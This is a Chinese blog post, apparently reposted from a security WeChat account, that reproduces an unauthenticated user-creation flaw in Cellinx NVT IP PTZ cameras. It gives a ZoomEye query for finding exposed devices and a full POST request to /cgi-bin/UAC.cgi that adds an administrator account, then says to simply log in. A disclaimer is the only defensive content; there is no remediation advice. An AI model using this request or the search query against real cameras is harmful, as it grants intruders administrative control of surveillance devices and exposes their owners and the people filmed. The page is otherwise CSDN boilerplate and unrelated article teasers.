韩国某摄像头公司存在未授权添加用户漏洞[漏洞复现]

最新推荐文章于 2024-07-24 15:20:08 发布
最新推荐文章于 2024-07-24 15:20:08 发布
阅读量392 收藏 9
点赞数 7
文章标签: web安全 网络 安全威胁分析 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Liyu_6618/article/details/135983788
版权

关注本公众号,长期推送技术文章

知攻善防实验室

红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源 工具,社工钓鱼,网络安全。

73篇原创内容

公众号

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

简介

Cellinx NVT IP PTZ是韩国Cellinx公司的一个摄像机设备。Cellinx NVT 摄像机 UAC.cgi 接口处存在任意用户创建漏洞,未经身份认证的攻击者可利用此接口创建管理员账户。

资产

ZoomEye语法:app:"Cellinx NVT IP PTZ"

图片

漏洞复现

POC:

POST /cgi-bin/UAC.cgi?TYPE=json HTTP/1.1host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36Content-Type: application/json;charset=UTF-8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 194
{"jsonData":{"username":"guest","password":"","option":"add_user","data":{"username":"test111","password":"test111","permission":{"is_admin":"1","view":"1","ptz":"1","setting":"1","dout":"1"}}}}

图片

系统会添加一个用户名为test111密码为test111的用户

图片

直接登录即可

图片

图片

关注公众号“知攻善防实验室”,后台回复:“交流群”获取技术交流群链接

知攻善防实验室
关注
  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Cellinx NVT 摄像机 UAC.cgi 任意用户创建漏洞复现
0xSec
01-16 649
Cellinx NVT 摄像机 UAC.cgi接口处存在任意用户创建漏洞经身份认证的攻击者可利用此接口创建管理员账户,登录后台可查看敏感信息,使系统处于极不安全的状态。
Cellinx NVT 摄像机 GetFileContent.cgi任意文件读取漏洞 (CVE-2023-23063)
0xSec
12-16 812
CellinxNVTv1.0.6.002b版本存在安全漏洞,该漏洞源于存在本地文件泄露漏洞,攻击者可读取系统密码等敏感信息。
国内某厂商摄像头敏感信息泄露漏洞事件分析
12-17 1368
国内某厂商摄像头敏感信息泄露漏洞事件分析 PDF 版报告下载:国内某厂商摄像头敏感信息泄露事件分析English Version:Webcam Sensitive Information Disclosure Vulnerability Analysis 1. 事件概述 国内某家监控产品供应商和解决方案服务商旗下有多款监控摄像机以及相关的配套设备。2017年3月5日,知道...
韩国某电信服务公司网站模板
01-20
该“韩国某电信服务公司网站模板”是一个专为电信服务公司设计的网页模板,用于构建高效、专业且具有吸引力的在线平台。这个模板通常包含了多种页面布局、设计元素和功能,旨在体现公司的品牌形象,提供良好的用户...
韩国某电信增值服务网络公司网页模板
01-20
本主题聚焦于一个特定的网页模板——“韩国某电信增值服务网络公司网页模板”,它适用于电信增值服务领域的网络公司,旨在提供高效且具有吸引力的在线展示。 网页模板通常包括以下组成部分: 1. **头部**:包含...
韩国公司模板
09-03
韩国公司模板】通常指的是适用于韩国企业或组织的网站设计模板,这些模板融合了韩国文化、商业风格和用户体验设计的特点。此类模板旨在为韩国企业提供一个快速建立专业网站的基础,节省设计和开发的时间与成本。 ...
韩国饮料产品进出口有限公司网站源代码
07-02
韩国饮料产品进出口有限公司网站源代码】这个主题涉及到的是网站开发和管理的领域,特别是针对一个特定的企业——韩国饮料产品进出口有限公司。网站源代码是构建和运行任何网站的基础,它包含了HTML、CSS、...
微软蓝屏”事件暴露了网络安全哪些问题?
2301_79339087的博客
07-23 1454
微软蓝屏事件不仅暴露了软件更新中的问题,更是一次对全球网络安全和系统稳定性的严峻考验。通过加强风险管理、质量控制、冗余设计和应急响应,我们可以在来减少类似事件的发生,提高整体网络安全水平。各行业应加强合作,信息共享,共同提升应对重大系统故障的能力,构建更加稳固和安全网络环境。在来,我们需要更加关注软件更新过程中的风险管理和质量控制,通过引入更多的自动化工具和流程,提高测试的覆盖率和效率,确保软件的安全性和稳定性。
网络安全-华为华三交换机防火墙日志解析示例
PanDD_0_1的博客
07-23 331
华为交换机日志解析示例。
网站验证:确保网络安全与信任的重要步骤
07-22 305
在数字时代,网站验证是确保网络安全和建立用户信任的关键措施。随着网络诈骗和恶意软件的日益增多,验证网站的真实性和安全性变得尤为重要。本文将探讨网站验证的重要性、常见的验证方法以及如何通过验证提升用户体验和网站信誉。
“微软蓝屏”事件暴露了网络安全哪些问题?
csdn_aspnet的专栏
07-23 1220
这次由微软系统软件更新引发的“微软蓝屏”事件,无疑是对全球IT基础设施韧性与安全性的重大考验。850万台设备的故障,以及对航空、医疗和传媒等关键行业的广泛影响,再次突显出我们在网络安全和系统稳定性方面的脆弱性。一、问题解析1、更新管理的复杂性:随着技术的不断进步,软件更新的复杂性也在增加。大型系统中,需要兼顾各种硬件、软件和环境,确保更新不会引发兼容性问题,而这往往十分困难。2、供应链风险:如这次事件所示,一个小小的缺陷就可能通过供应链扩散,造成全球性影响。
网络安全常见错误及解决办法(更新中)
qq_42041946的博客
07-22 487
设置一下wwwtest访问权限做负载均衡使用火狐浏览器访问一直访问一个页面,使用谷歌就正常两个也轮换,是火狐浏览器的问题在nginx的配置文件里改站点根目录,但是网页报了403 Forbidden,重安装了个centos也不行强制刷新过了,改回相对路径html才可以。答:403就是没有权限 再/web这个文件夹下chown -R nginx:nginx .(如果不行就看看你的selinux 有没有关闭,vim /etc/selinux/config 看看是不是disabled。
2022 年中高职组“网络安全”赛项-海南省省竞赛任务书-1-B模块-B-4Web渗透测试
轻舟已过万重山
07-23 248
通过本地 PC 中渗透测试平台 Kali 对服务器场景 PYsystem2020 进行渗透测试,通过本地 PC 中渗透测试平台 Kali 对服务器场景 PYsystem2020 进行渗透测试,通过本地 PC 中渗透测试平台 Kali 对服务器场景 PYsystem2020进行渗透测试,这里因为我们的Web服务器MySQL数据库版本原因,所以我换了台Web服务器,进行测试。将该场景中数据库的版本号作为 FLAG(例如:5.0.22)提交。换的这台Linux的服务器的IP为192。需要提交的flag:【
等级保护 总结2
最新发布
qq_25467441的博客
07-24 349
FireHunter 6000是华为公司推出的高性能APT威胁检测系统,利用多引擎虚拟检测技术以及传统的安全检测技术,基于行为特征检测,识别网络中传输的恶意文件和C&C攻击,有效避免威胁攻击的扩散和企业核心信息资产损失。AntiDDoS管理等功能,支持安全功能服务化、可视化,协同网络安全设备和大数据智能分析系统形成全面威胁感知、分析和响应的整网主动安全防护体系。安全态势感知系统协同网络安全实现威胁自动近源处置,提升威胁处置效率,缩小威胁横向扩散的范围,降低威胁对业务的影响。
通过“微软蓝屏”事件对网络安全的思考
技术分享、程序员趣事、行业趋势等内容!
07-23 689
近日,一次由微软视窗系统软件更新引发的全球性“微软蓝屏”事件,不仅成为科技领域的热点新闻,更是一次对全球IT基础设施韧性与安全性的深刻检验。这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。面对如此大规模的系统中断,网络安全与系统稳定性的讨论再次被推上风口浪尖。如何构建更加稳固和安全网络环境?
网络安全相关竞赛比赛
黑战士的博客
07-18 925
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
中小企业常见的网络安全问题及防范措施
w651428055的博客
07-22 627
在当今数字化时代,Web应用程序已经成为企业与用户互动的主要平台,但随之而来的是日益复杂的网络安全威胁。为了保护Web应用程序免受各种攻击,Web应用程序防火墙(WAF)应运而生。本文将深入探讨WAF的概念、工作原理、分类、特点以及如何选择和部署WAF,帮助读者更全面地理解WAF在网络安全中的重要作用。
WEB安全-SQL注入
深度安全实验室
07-23 226
WEB安全-SQL注入
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值